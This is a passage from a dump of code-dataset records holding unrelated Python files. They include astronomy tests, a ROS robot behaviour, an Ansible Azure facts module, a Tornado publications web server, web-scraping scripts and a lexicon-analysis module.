assert_allclose(data[\"gamma_rate\"].value, 10.988, rtol=1e-3)\n assert_allclose(data[\"bg_rate\"].value, 5.1335, rtol=1e-3)\n assert_allclose(data[\"livetime\"].value, 26.362, rtol=1e-3)\n\n @staticmethod\n def test_bad_on(stats_bad_on_region):\n data = stats_bad_on_region.to_dict()\n assert data[\"alpha\"] == 0\n\n @staticmethod\n def test_stack(stats_stacked):\n data = stats_stacked.to_dict()\n assert data[\"n_on\"] == 900\n assert data[\"n_off\"] == 798\n assert_allclose(data[\"alpha\"], 0.333, rtol=1e-2)\n assert_allclose(data[\"sigma\"], 24.6307, rtol=1e-3)\n\n @staticmethod\n def test_stack_bad_on(stats_stacked_bad_on_region):\n data = stats_stacked_bad_on_region.to_dict()\n assert data[\"n_on\"] == 156\n assert data[\"n_off\"] == 1114\n assert_allclose(data[\"alpha\"], 0.1111, rtol=1e-3)\n assert_allclose(data[\"livetime\"].value, 26.211, rtol=1e-3)\n","sub_path":"gammapy/data/tests/test_obs_stats.py","file_name":"test_obs_stats.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"442163982","text":"#!/usr/bin/env python\nimport roslib; \nroslib.load_manifest('fmDecisionMakers')\nimport rospy\nimport smach\nimport smach_ros\nimport actionlib\nimport math\nimport tf\nfrom fmExecutors.msg import timed_turnAction,timed_turnGoal \nfrom fmMsgs.msg import adc\n \n\ndef force_preempt(a):\n return True\n\ndef line_found(ud,msg):\n if msg.value[0] > ud.threshold:\n return False\n elif msg.value[1] > ud.threshold:\n return False\n else: \n return True\n \n\ndef build_wiggle_sm(threshold, width):\n wiggle_sm = smach.StateMachine(outcomes = ['succeeded','aborted','preempted'])\n with wiggle_sm:\n smach.StateMachine.add('WIGGLE_LEFT',\n smach_ros.SimpleActionState('/fmExecutors/timed_turn',timed_turnAction,goal=timed_turnGoal(time=2.0, vel=0.1)),\n transitions = {'succeeded':'WIGGLE_RIGHT','aborted':'aborted','preempted':'preempted'}\n )\n 
smach.StateMachine.add('WIGGLE_RIGHT',\n smach_ros.SimpleActionState('/fmExecutors/timed_turn',timed_turnAction,goal=timed_turnGoal(time=2.0, vel=-0.1)),\n transitions = {'succeeded':'WIGGLE_LEFT','aborted':'aborted','preempted':'preempted'}\n )\n return wiggle_sm\n \ndef build_find_line_behaviour(threshold,vel):\n find_line_sm = smach.Concurrence(outcomes=['succeeded','preempted','aborted'],\n default_outcome = 'aborted',\n outcome_map = {\n 'succeeded':{'WIGGLE':'preempted','FIND_LINE':'invalid'},\n 'preempted':{'WIGGLE':'preempted','FIND_LINE':'preempted'}\n },\n child_termination_cb=force_preempt)\n find_line_sm.userdata.threshold = threshold\n with find_line_sm:\n smach.Concurrence.add('WIGGLE',build_wiggle_sm(threshold,vel))\n smach.Concurrence.add('FIND_LINE',smach_ros.MonitorState(\"/fmSensors/adc\",adc,line_found,-1),\n remapping = {'threshold':'threshold'})\n \n return find_line_sm\n\n","sub_path":"fmDecisionMakers/src/behaviours/line_behaviours/find_line_behaviour.py","file_name":"find_line_behaviour.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"14542768","text":"import re\n\nclass CacheControl(object):\n def __init__(self, rules=None):\n self.rules = rules or []\n\n def cache_control(self, event):\n response = event.get('response')\n request = event.get('request')\n context = event.get('context')\n\n if request.method in [\"GET\", \"HEAD\"]:\n rule = self.find_rule(context.node)\n else:\n rule = self.get_default()\n\n response.headers['Cache-Control'] = \", \".join(rule['Cache-Control'])\n\n def find_rule(self, node):\n for rule in self.rules:\n if rule['path'].match(node.id):\n return rule\n\n return self.get_default()\n\n def get_default(self):\n return {\n 'Cache-Control': ['private', 'must-revalidate']\n 
}","sub_path":"element/plugins/cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389327958","text":"from src.crawl_web import crawl_web\nfrom src.todos_paquetes_link import todos_paquetes_link\nfrom urllib.request import urlopen\nlink = \"https://bertavr.github.io/Proyecto_Rick_y_Morty/index.html\"\n\ndef web_scrapping (link):\n lista = []\n links = crawl_web(link)\n for enlace in links:\n packs_de_un_link = []\n html = convertir_string(link)\n buscador = html.find('nombre')\n if buscador != -1:\n packs_de_un_link = todos_paquetes_link(html)\n lista.append(packs_de_un_link)\n return lista\nprint(web_scrapping(link))\n\n","sub_path":"pytest/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147486593","text":"#!/usr/bin/python\n#\n# Copyright (c) 2018 Zim Kalinowski, \n#\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: azure_rm_storsimpledevice_facts\nversion_added: \"2.8\"\nshort_description: Get Azure Device facts.\ndescription:\n - Get facts of Azure Device.\n\noptions:\n device_name:\n description:\n - The device name.\n resource_group:\n description:\n - The resource group name\n required: True\n name:\n description:\n - The manager name\n required: True\n expand:\n description:\n - Specify $expand=details to populate additional fields related to the device.\n\nextends_documentation_fragment:\n - azure\n\nauthor:\n - \"Zim Kalinowski (@zikalino)\"\n\n'''\n\nEXAMPLES = '''\n - name: Get instance of Device\n 
azure_rm_storsimpledevice_facts:\n device_name: device_name\n resource_group: resource_group_name\n name: manager_name\n expand: expand\n\n - name: List instances of Device\n azure_rm_storsimpledevice_facts:\n resource_group: resource_group_name\n name: manager_name\n expand: expand\n'''\n\nRETURN = '''\ndevices:\n description: A list of dictionaries containing facts for Device.\n returned: always\n type: complex\n contains:\n id:\n description:\n - The identifier.\n returned: always\n type: str\n sample: \"/subscriptions/9eb689cd-7243-43b4-b6f6-5c65cb296641/resourceGroups/ResourceGroupForSDKTest/providers/Microsoft.StorSimple/managers/hAzur\n eSDKOperations/devices/HSDK-ARCSX4MVKZ\"\n name:\n description:\n - The name.\n returned: always\n type: str\n sample: HSDK-ARCSX4MVKZ\n culture:\n description:\n - \"Language culture setting on the device. For eg: 'en-US'\"\n returned: always\n type: str\n sample: en-US\n status:\n description:\n - \"Current status of the device. Possible values include: 'Unknown', 'Online', 'Offline', 'RequiresAttention', 'MaintenanceMode',\n 'Creating', 'Provisioning', 'Deleted', 'ReadyToSetup', 'Deactivated', 'Deactivating'\"\n returned: always\n type: str\n sample: Online\n'''\n\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\n\ntry:\n from msrestazure.azure_exceptions import CloudError\n from azure.mgmt.storsimple import StorSimpleManagementClient\n from msrest.serialization import Model\nexcept ImportError:\n # This is handled in azure_rm_common\n pass\n\n\nclass AzureRMDeviceFacts(AzureRMModuleBase):\n def __init__(self):\n # define user inputs into argument\n self.module_arg_spec = dict(\n device_name=dict(\n type='str'\n ),\n resource_group=dict(\n type='str',\n required=True\n ),\n name=dict(\n type='str',\n required=True\n ),\n expand=dict(\n type='str'\n )\n )\n # store the results of the module operation\n self.results = dict(\n changed=False\n )\n self.mgmt_client = None\n self.device_name = None\n 
self.resource_group = None\n self.name = None\n self.expand = None\n super(AzureRMDeviceFacts, self).__init__(self.module_arg_spec, supports_tags=False)\n\n def exec_module(self, **kwargs):\n for key in self.module_arg_spec:\n setattr(self, key, kwargs[key])\n self.mgmt_client = self.get_mgmt_svc_client(StorSimpleManagementClient,\n base_url=self._cloud_environment.endpoints.resource_manager)\n\n if self.device_name is not None:\n self.results['devices'] = self.get()\n else:\n self.results['devices'] = self.list_by_manager()\n return self.results\n\n def get(self):\n response = None\n results = []\n try:\n response = self.mgmt_client.devices.get(device_name=self.device_name,\n resource_group_name=self.resource_group,\n manager_name=self.name)\n self.log(\"Response : {0}\".format(response))\n except CloudError as e:\n self.log('Could not get facts for Device.')\n\n if response is not None:\n results.append(self.format_response(response))\n\n return results\n\n def list_by_manager(self):\n response = None\n results = []\n try:\n response = self.mgmt_client.devices.list_by_manager(resource_group_name=self.resource_group,\n manager_name=self.name)\n self.log(\"Response : {0}\".format(response))\n except CloudError as e:\n self.log('Could not get facts for Device.')\n\n if response is not None:\n for item in response:\n results.append(self.format_response(item))\n\n return results\n\n def format_response(self, item):\n d = item.as_dict()\n d = {\n 'resource_group': self.resource_group,\n 'id': d.get('id', None),\n 'name': d.get('name', None),\n 'culture': d.get('culture', None),\n 'status': d.get('status', None)\n }\n return d\n\n\ndef main():\n AzureRMDeviceFacts()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/azure_rm_storsimpledevice_facts.py","file_name":"azure_rm_storsimpledevice_facts.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"7854492","text":"#!/usr/bin/python2\n\"Web application server for a simple publications database.\"\n\nfrom __future__ import print_function\n\nimport logging\nimport os\n\nimport tornado.web\nimport tornado.ioloop\n\nfrom publications import settings\nfrom publications import uimodules\nfrom publications import utils\nfrom publications.requesthandler import RequestHandler\n\nfrom publications.home import (Home,\n Contact)\nfrom publications.login import (Login,\n Logout)\nfrom publications.account import (Account,\n AccountJson,\n Accounts,\n AccountsJson,\n AccountAdd,\n AccountEdit,\n AccountReset,\n AccountPassword,\n AccountDisable,\n AccountEnable)\nfrom publications.publication import (Publication,\n PublicationJson,\n Publications,\n PublicationsTable,\n PublicationsJson,\n PublicationsCsv,\n PublicationsUnverified,\n PublicationVerify,\n PublicationsNoPmid,\n PublicationsNoDoi,\n PublicationsModified,\n PublicationAdd,\n PublicationFetch,\n PublicationEdit,\n PublicationBlacklist)\nfrom publications.journal import (Journal,\n JournalJson,\n JournalEdit,\n Journals,\n JournalsJson)\nfrom publications.label import (Label,\n LabelJson,\n LabelsList,\n LabelsTable,\n LabelsJson,\n LabelAdd,\n LabelEdit,\n LabelMerge)\nfrom publications.search import (Search,\n SearchJson)\nfrom publications.logs import Logs\n\n\ndef get_args():\n parser = utils.get_command_line_parser(description=\n 'Publications web server')\n parser.add_argument('-p', '--pidfile',\n action='store', dest='pidfile', default=None,\n metavar=\"FILE\", help=\"filename of file containing PID\")\n return parser.parse_args()\n\ndef main():\n args = get_args()\n utils.load_settings(filepath=args.settings)\n\n url = tornado.web.url\n handlers = [url(r'/', Home, name='home'),\n url(r'/site/([^/]+)', tornado.web.StaticFileHandler,\n {'path': settings['SITE_DIR']}, name='site'),\n url(r'/publication/([^/.]+)', Publication, name='publication'),\n url(r'/publication/([^/.]+).json',\n 
PublicationJson, name='publication_json'),\n url(r'/publications/(\\d{4})',\n Publications, name='publications_year'),\n url(r'/publications/(\\d{4}).json',\n PublicationsJson, name='publications_year_json'),\n url(r'/publications', Publications, name='publications'),\n url(r'/publications.json', \n PublicationsJson, name='publications_json'),\n url(r'/publications/csv', \n PublicationsCsv, name='publications_csv'),\n url(r'/publications/table/(\\d{4})',\n PublicationsTable, name='publications_table_year'),\n url(r'/publications/table',\n PublicationsTable, name='publications_table'),\n url(r'/publications/unverified',\n PublicationsUnverified, name='publications_unverified'),\n url(r'/verify/([^/]+)',\n PublicationVerify, name='publication_verify'),\n url(r'/publications/no_pmid',\n PublicationsNoPmid, name='publications_no_pmid'),\n url(r'/publications/no_doi',\n PublicationsNoDoi, name='publications_no_doi'),\n url(r'/publications/modified',\n PublicationsModified, name='publications_modified'),\n url(r'/edit/([^/]+)',\n PublicationEdit, name='publication_edit'),\n url(r'/add',\n PublicationAdd, name='publication_add'),\n url(r'/fetch',\n PublicationFetch, name='publication_fetch'),\n url(r'/blacklist/([^/]+)',\n PublicationBlacklist, name='publication_blacklist'),\n url(r'/journals', Journals, name='journals'),\n url(r'/journals.json', JournalsJson, name='journals_json'),\n url(r'/journal/([^/]+).json', JournalJson,name='journal_json'),\n url(r'/journal/([^/]+)', Journal, name='journal'),\n url(r'/journal/([^/]+)/edit', JournalEdit,name='journal_edit'),\n url(r'/labels', LabelsList, name='labels'),\n url(r'/labels.json', LabelsJson, name='labels_json'),\n url(r'/labels/table', LabelsTable, name='labels_table'),\n url(r'/label/([^/.]+).json', LabelJson, name='label_json'),\n url(r'/label/([^/.]+)', Label, name='label'),\n url(r'/label', LabelAdd, name='label_add'),\n url(r'/label/([^/]+)/edit', LabelEdit, name='label_edit'),\n url(r'/label/([^/]+)/merge', 
LabelMerge, name='label_merge'),\n url(r'/account/reset', AccountReset, name='account_reset'),\n url(r'/account/password',\n AccountPassword, name='account_password'),\n url(r'/account/([^/]+).json', AccountJson,name='account_json'),\n url(r'/account/([^/]+)', Account, name='account'),\n url(r'/account/([^/]+)/edit',\n AccountEdit, name='account_edit'),\n url(r'/account/([^/]+)/disable',\n AccountDisable, name='account_disable'),\n url(r'/account/([^/]+)/enable',\n AccountEnable, name='account_enable'),\n url(r'/accounts', Accounts, name='accounts'),\n url(r'/accounts.json', AccountsJson, name='accounts_json'),\n url(r'/account', AccountAdd, name='account_add'),\n url(r'/search', Search, name='search'),\n url(r'/search.json', SearchJson, name='search_json'),\n url(r'/logs/([^/]+)', Logs, name='logs'),\n url(r'/contact', Contact, name='contact'),\n url(r'/login', Login, name='login'),\n url(r'/logout', Logout, name='logout'),\n ]\n\n os.chdir(settings['ROOT'])\n application = tornado.web.Application(\n handlers=handlers,\n debug=settings.get('TORNADO_DEBUG', False),\n cookie_secret=settings['COOKIE_SECRET'],\n xsrf_cookies=True,\n ui_modules=uimodules,\n template_path='html',\n static_path='static',\n login_url=r'/login')\n application.listen(settings['PORT'], xheaders=True)\n pid = os.getpid()\n logging.info(\"web server PID %s at %s\", pid, settings['BASE_URL'])\n if args.pidfile:\n with open(args.pidfile, 'w') as pf:\n pf.write(str(pid))\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"publications/app_publications.py","file_name":"app_publications.py","file_ext":"py","file_size_in_byte":7885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"232717659","text":"ESCAPE_CHARS = {\r\n \"dash\": b'\\xe2\\x80\\x93'.decode(),\r\n \"dash2\": b\"\\xe2\\x80\\x94\".decode(),\r\n \"quote\": b'\\xe2\\x80\\x99'.decode(),\r\n \"double-quote\": 
b'\\xe2\\x80\\x98'.decode(),\r\n \"double-quote-open\": b\"\\xe2\\x80\\x9c\".decode(),\r\n \"double-quote-close\": b\"\\xe2\\x80\\x9d\".decode(),\r\n \"e\": b\"\\xc3\\xa8\".decode(),\r\n \"e2\": b\"\\xc3\\xa9\".decode(),\r\n \"unknown\": b\"\\xc2\\xad\".decode(),\r\n \"unknown2\": b\"\\x0b\".decode(),\r\n \"copy\": b\"\\xc2\\xa9\".decode()\r\n}\r\n","sub_path":"string_test.py","file_name":"string_test.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503039495","text":"import sys, getopt\n\ndef fibonacy(n):\n\tstack = [0, 1]\n\tresult = 1\n\tfor i in range(n-1):\n\t\tlast = stack.pop()\n\t\tpre_last = stack.pop()\n\t\tresult = last + pre_last\n\t\tstack.append(last)\n\t\tstack.append(result)\n\treturn result\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], \"n:\")\nexcept getopt.GetoptError:\n\tprint(\"usage: python3 program.py -n \")\n\tsys.exit(2)\n\nn = 1\nfor opt, arg in opts:\n\tif opt == '-n':\n\t\tn = int(arg)\n\nprint(\"compute fibonacy at \" + str(n) + \" position:\")\nresult = fibonacy(n)\nprint(result)\n","sub_path":"fibonacy_stack/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"94816816","text":"import pandas as pd\r\nimport numpy as np\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\n# 네이버 영화 url\r\nurl = \"https://movie.naver.com/movie/running/premovie.nhn\"\r\n# requests 요청\r\nresponse = requests.get(url)\r\n# 응답 확인\r\nresponse\r\n# 해당 text를 html로 변환\r\nhtml = BeautifulSoup(response.text,\"html.parser\")\r\n# 특정 태그 선택\r\ndata = html.select('div.obj_section div.lst_wrap ul.lst_detail_t1 li')\r\nnames = [] # 영화 제목\r\ndirectors = [] # 영화 감독명\r\nactors = [] # 영화 배우명\r\nratings = [] # 영화 관람등급\r\ngenres = [] # 영화 장르\r\ntimes = [] # 영화 상영시간\r\nrelease_dates = [] # 영화 개봉예정일\r\nanticipate_up = [] # 기대지수 
UP\r\nanticipate_down = [] # 기대지수 DOWN\r\n\r\nfor item in data:\r\n # 각 컬럼별 태그 위치를 찾아서 리스트에 추가, 없다면 결측치 입력\r\n try:\r\n names.append(item.select('dl.lst_dsc dt.tit a')[0].text.strip())\r\n except IndexError:\r\n names.append(None)\r\n try:\r\n directors.append(re.sub('[\\r\\t\\n]','',item.select('dl.lst_dsc dl.info_txt1 dd')[1].text.strip()))\r\n except IndexError:\r\n directors.append(None)\r\n try:\r\n actors.append(re.sub('[\\r\\t\\n]','',item.select('dl.lst_dsc dl.info_txt1 dd')[2].text.strip()))\r\n except IndexError:\r\n actors.append(None)\r\n try:\r\n ratings.append(item.select('dl.lst_dsc dt.tit span')[0].text.strip())\r\n except IndexError:\r\n ratings.append(None)\r\n try:\r\n genre = item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')[0].text.strip()\r\n if len(item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')) > 1:\r\n for i in item.select('dl.lst_dsc dl.info_txt1 dd')[0].select('a')[1:]:\r\n genre += f', {i.text.strip()}'\r\n genres.append(genre)\r\n except IndexError:\r\n genres.append(None)\r\n try:\r\n star = item.select('dl.lst_dsc dd.star dl.info_exp em')\r\n anticipate_up.append(star[0].text.strip())\r\n anticipate_down.append(star[1].text.strip())\r\n except IndexError:\r\n anticipate_up.append(None)\r\n anticipate_down.append(None)\r\n instance = re.sub('[\\r\\t\\n]','',item.select('dl.info_txt1 dd')[0].text.strip()).split('|')\r\n tflag = False\r\n rflag = False\r\n for i in instance:\r\n if '분' in i:\r\n times.append(i.replace(\"분\",\"\"))\r\n tflag = True\r\n elif '개봉' in i:\r\n release_dates.append(i.replace(\"개봉\",\"\").strip())\r\n rflag = True\r\n else :\r\n continue\r\n if tflag == False :\r\n times.append(None)\r\n if rflag == False:\r\n release_dates.append(None)\r\n# 데이터 프레임 생성\r\ndf = pd.DataFrame(columns=['Name','Director','Actor','Rating','Genre','Time','Release Date'])\r\ndf['Name'] = names\r\ndf['Director'] = directors\r\ndf['Actor'] = actors\r\ndf['Rating'] = ratings\r\ndf['Genre'] = genres\r\ndf['Time'] = 
times\r\ndf['Release Date'] = release_dates\r\ndf['anticipate Up'] = anticipate_up\r\ndf['anticipate Down'] = anticipate_down\r\n# 기대지수가 없는 경우(재개봉)를 제외한 새로운 데이터프레임 생성\r\ndf2 = df.dropna(subset=['anticipate Up'])\r\n# 인덱스 재지정 및 삭제\r\ndf2.reset_index(inplace=True)\r\ndel df2['index']\r\n\r\ndf.to_csv('./movie_final.csv',encoding='utf-8-sig')\r\ndf2.to_csv('./movies_2.csv',encoding='utf-8-sig')","sub_path":"movie_crawaler.py","file_name":"movie_crawaler.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179968561","text":"\"\"\"Classes for representing items in the English Lexicon Project database.\"\"\"\n\n# Copyright (C) 2011-2013 Constantine Lignos\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport re\nfrom collections import defaultdict\nfrom operator import attrgetter\n\n\nNULL = \" \"\nMISANALYSIS_MARKER = \"--\"\nANALYSIS_RE = re.compile(r'^(.+<)*-?(\\{.+\\})(>.+)*$')\nSEP_RE = re.compile(r'[<>{}]+')\n\n_INFLECTIONAL_SUFFIXES = set(('s', 'ed', 'ing'))\nSUFFIX_COMPOUNDS = set((\n \"woman\",\n \"women\",\n \"man\",\n \"men\",\n \"land\",\n # What about ship? 
(showmanship, brinksmanship)\n))\nSUFFIX_MERGES = {\n 'ible': '*ble',\n 'able': '*ble',\n 'er': '*r',\n 'or': '*r',\n 'ance': '*nce',\n 'ence': '*nce',\n # -ant/-ent both have the same N/Adj syncretic forms:\n # combat-ant (N/Adj), depend-ent (N/Adj)\n 'ant': '*nt',\n 'ent': '*nt',\n # ELP standardized on 'ise', but there's one mistaken 'ize'\n 'ize': 'ise',\n}\nEXCLUDED_SUFFIXES = set((\n \"n't\",\n \"'s\",\n \"'d\",\n \"'ll\",\n \"'ve\",\n \"'t\",\n \"'m\",\n \"'re\",\n # Cannot distinguish between magic>ian> and Corinth>ian>,\n # suburb-an and Rome-an\n 'ian',\n 'an',\n # Cannot distinguish -en forms (blown) from (Californian). This\n # could be fixed by knowing irregulars, but other forms may have\n # some of the -ian/-an problems.\n 'n',\n))\nBAD_SUFFIXES = SUFFIX_COMPOUNDS | EXCLUDED_SUFFIXES\n# Some things to think about further:\n# ate_1/ate_2: fabricate, obstinate, use pron to tell these apart?\nNULL_AFFIX = \" \"\n\n\nclass AnalysisParseError(Exception):\n \"\"\"An analysis string could not be parsed.\"\"\"\n pass\n\n\nclass Lexicon(dict):\n \"\"\"Dictionary-based class to hold all words\"\"\"\n\n def __init__(self):\n \"\"\"Create empty frequency tables at initialization.\"\"\"\n self.suffix_freqs_hal = defaultdict(int)\n self.suffix_freqs_kf = defaultdict(int)\n self.suffix_freqs_sbtlx = defaultdict(int)\n self.suffix_freqs_celex = defaultdict(int)\n self.base_freqs_hal = defaultdict(int)\n self.base_freqs_kf = defaultdict(int)\n self.base_freqs_sbtlx = defaultdict(int)\n self.base_freqs_celex = defaultdict(int)\n self.base_suffixprobs = defaultdict(lambda: defaultdict(int))\n # Words sharing an inflection\n self.inflect_sets = defaultdict(set)\n # Words sharing a root\n self.root_sets = defaultdict(set)\n # Track ranks, for now assuming there is just one frequency measure to compute this over.\n self.word_ranks = {}\n self.base_ranks = {}\n # Base init\n dict.__init__(self)\n\n def compute_freqs(self):\n \"\"\"Compute base and suffix frequencies in the 
lexicon.\"\"\"\n # Add up frequencies and build inflection and derivational lemmas\n for word in self.values():\n # Count all suffixes\n if word.suffixes:\n for suffix in word.suffixes:\n self.suffix_freqs_hal[suffix] += word.freq_hal\n self.suffix_freqs_kf[suffix] += word.freq_kf\n self.suffix_freqs_sbtlx[suffix] += word.freq_sbtlx\n self.suffix_freqs_celex[suffix] += word.freq_celex\n\n self.base_freqs_hal[word.root] += word.freq_hal\n self.base_freqs_kf[word.root] += word.freq_kf\n self.base_freqs_sbtlx[word.root] += word.freq_sbtlx\n self.base_freqs_celex[word.root] += word.freq_celex\n\n # Exclude derived words, fake words, and proper nouns from inflectional sets\n if not (word.derivational or word.fake or word.text[0].isupper()):\n # Add to inflection and root sets\n self.root_sets[word.root].add(word.text)\n self.inflect_sets[word.root].add(word.text)\n # Always throw in the root too\n self.inflect_sets[word.root].add(word.root)\n\n def compute_ranks(self):\n \"\"\"Compute ranks of words, bases, and words within each base.\"\"\"\n # Extract words and bases with their frequencies\n self.word_ranks = {word.text: (idx + 1) for idx, word in\n enumerate(sorted(self.values(), key=attrgetter('freq_sbtlx'),\n reverse=True))}\n self.base_ranks = {root: (idx + 1) for idx, root in\n enumerate(sorted(self.base_freqs_sbtlx, key=self.base_freqs_sbtlx.get,\n reverse=True))}\n\n def word_rank(self, word):\n \"\"\"Return the rank of a word.\"\"\"\n return self.word_ranks[word.text] if word.text in self.word_ranks else None\n\n def base_rank(self, base):\n \"\"\"Return the rank of a base.\"\"\"\n return self.base_ranks[base] if base in self.base_ranks else None\n\n def base_freq_hal(self, base):\n \"\"\"Return the frequency of a base using HAL.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_hal[base] if base in self.base_freqs_hal else None\n\n def base_freq_kf(self, base):\n \"\"\"Return the frequency of a base using KF.\"\"\"\n # Since 
it's a defaultdict, do an explicit check\n return self.base_freqs_kf[base] if base in self.base_freqs_kf else None\n\n def base_freq_sbtlx(self, base):\n \"\"\"Return the frequency of a base using SUBTLEX.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_sbtlx[base] if base in self.base_freqs_sbtlx else None\n\n def base_freq_celex(self, base):\n \"\"\"Return the frequency of a base using CELEX.\"\"\"\n # Since it's a defaultdict, do an explicit check\n return self.base_freqs_celex[base] if base in self.base_freqs_celex else None\n\n def suffix_freq_hal(self, suffix):\n \"\"\"Return the frequency of a suffix using HAL.\"\"\"\n return self.suffix_freqs_hal[suffix]\n\n def suffix_freq_kf(self, suffix):\n \"\"\"Return the frequency of a suffix using KF.\"\"\"\n return self.suffix_freqs_kf[suffix]\n\n def suffix_freq_sbtlx(self, suffix):\n \"\"\"Return the frequency of a suffix using SUBTLEX.\"\"\"\n return self.suffix_freqs_sbtlx[suffix]\n\n def suffix_freq_celex(self, suffix):\n \"\"\"Return the frequency of a suffix using CELEX.\"\"\"\n return self.suffix_freqs_celex[suffix]\n\n def p_form_base_hal(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_hal / float(self.base_freqs_hal[word.root])\n if self.base_freqs_hal[word.root] else None)\n\n def p_form_base_kf(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_kf / float(self.base_freqs_kf[word.root])\n if self.base_freqs_kf[word.root] else None)\n\n def p_form_base_sbtlx(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # Check for non-zero frequency\n return (word.freq_sbtlx / float(self.base_freqs_sbtlx[word.root])\n if self.base_freqs_sbtlx[word.root] else None)\n\n def p_form_base_celex(self, word):\n \"\"\"Return the probability of the word form within its base.\"\"\"\n # 
Check for non-zero frequency\n return (word.freq_celex / float(self.base_freqs_celex[word.root])\n if self.base_freqs_celex[word.root] else None)\n\n def freq_greater_root_sbtlx(self, word):\n \"\"\"Return whether word is more freq. than root, None if it's the root or has no freq.\"\"\"\n try:\n if word.text == word.root or not word.freq_sbtlx or not self[word.root].freq_sbtlx:\n return None\n return word.freq_sbtlx > self[word.root].freq_sbtlx\n except KeyError:\n return None\n\n\nclass Word(object):\n \"\"\"Representation of data for a word, including frequency and RT data.\"\"\"\n __slots__ = (\"text\", \"length\", \"freq_hal\", \"freq_kf\", \"freq_sbtlx\", \"freq_celex\",\n \"prefixes\", \"suffixes\", \"root\", \"inflectional\", \"derivational\", \"analysis\",\n \"nphon\", \"nsyll\", \"fake\")\n\n def __init__(self, text, length, freq_hal, freq_kf, freq_sbtlx, freq_celex, analysis,\n nphon, nsyll, fake=False):\n \"\"\"Set basic information about the word and parse the analysis.\"\"\"\n self.text = text\n self.length = length\n self.freq_kf = freq_kf\n self.freq_hal = freq_hal\n self.freq_sbtlx = freq_sbtlx\n self.freq_celex = freq_celex\n self.nphon = nphon\n self.nsyll = nsyll\n self.fake = fake\n\n # This may raise a AnalysisParseError, which is passed on to the caller.\n self.prefixes, roots, self.suffixes = parse_analysis(analysis)\n # If there's more than one root, we can't make use of this\n if len(roots) > 1:\n raise AnalysisParseError(\"Compound forms are excluded\")\n else:\n self.root = roots[0]\n\n # Store the updated analysis\n self.analysis = format_analysis(self.prefixes, [self.root], self.suffixes)\n\n # Mark inflectional/derivational\n self.inflectional = self.derivational = False\n if self.suffixes:\n if self.suffixes[-1] in _INFLECTIONAL_SUFFIXES:\n self.inflectional = True\n # If it's inflected but also has more than one suffix\n # or has any prefixes, mark derivational.\n if len(self.suffixes) > 1 or self.prefixes:\n self.derivational = 
True\n else:\n self.derivational = True\n elif self.prefixes:\n self.derivational = True\n\n def __len__(self):\n return len(self.text)\n\n def __str__(self):\n return self.text\n\n def __repr__(self):\n return \"\"\n\n\ndef parse_word(adict):\n \"\"\"Parse a word from a dict of the ELP fields for the word.\"\"\"\n if adict['MorphSp'] == \"NULL\":\n return None\n else:\n # Clean up the KF frequency, putting zero where needed\n if adict['Freq_KF'] == \"NULL\":\n adict['Freq_KF'] = 0\n\n # Catch any parsing errors by returning None\n try:\n # Put in None for the SUBTLEX/CELEX frequency as we can't get it out of the ELP data\n return Word(adict['Word'], adict['Length'], int(adict['Freq_HAL']),\n int(adict['Freq_KF']), None, None, adict['MorphSp'],\n adict['NPhon'], adict['NSyll'])\n except AnalysisParseError:\n return None\n\n\ndef _correct_suffixes(roots, suffixes):\n \"\"\"Return (roots, suffixes) with better analyses, possibly modifying the originals.\"\"\"\n\n # If we find one of these at the start of suffixes, they can\n # easily be moved into the roots.\n if suffixes[0] in SUFFIX_COMPOUNDS:\n roots.append(suffixes.pop(0))\n\n # Merge suffixes that need it\n suffixes = [SUFFIX_MERGES.get(suffix, suffix) for suffix in suffixes]\n\n return roots, suffixes\n\n\ndef _exclude_analysis(prefixes, roots, suffixes): # pylint: disable=W0613\n \"Return whether we should exclude an analysis.\"\"\"\n # Some of the men/women compounds can't easily be fixed. For\n # example, 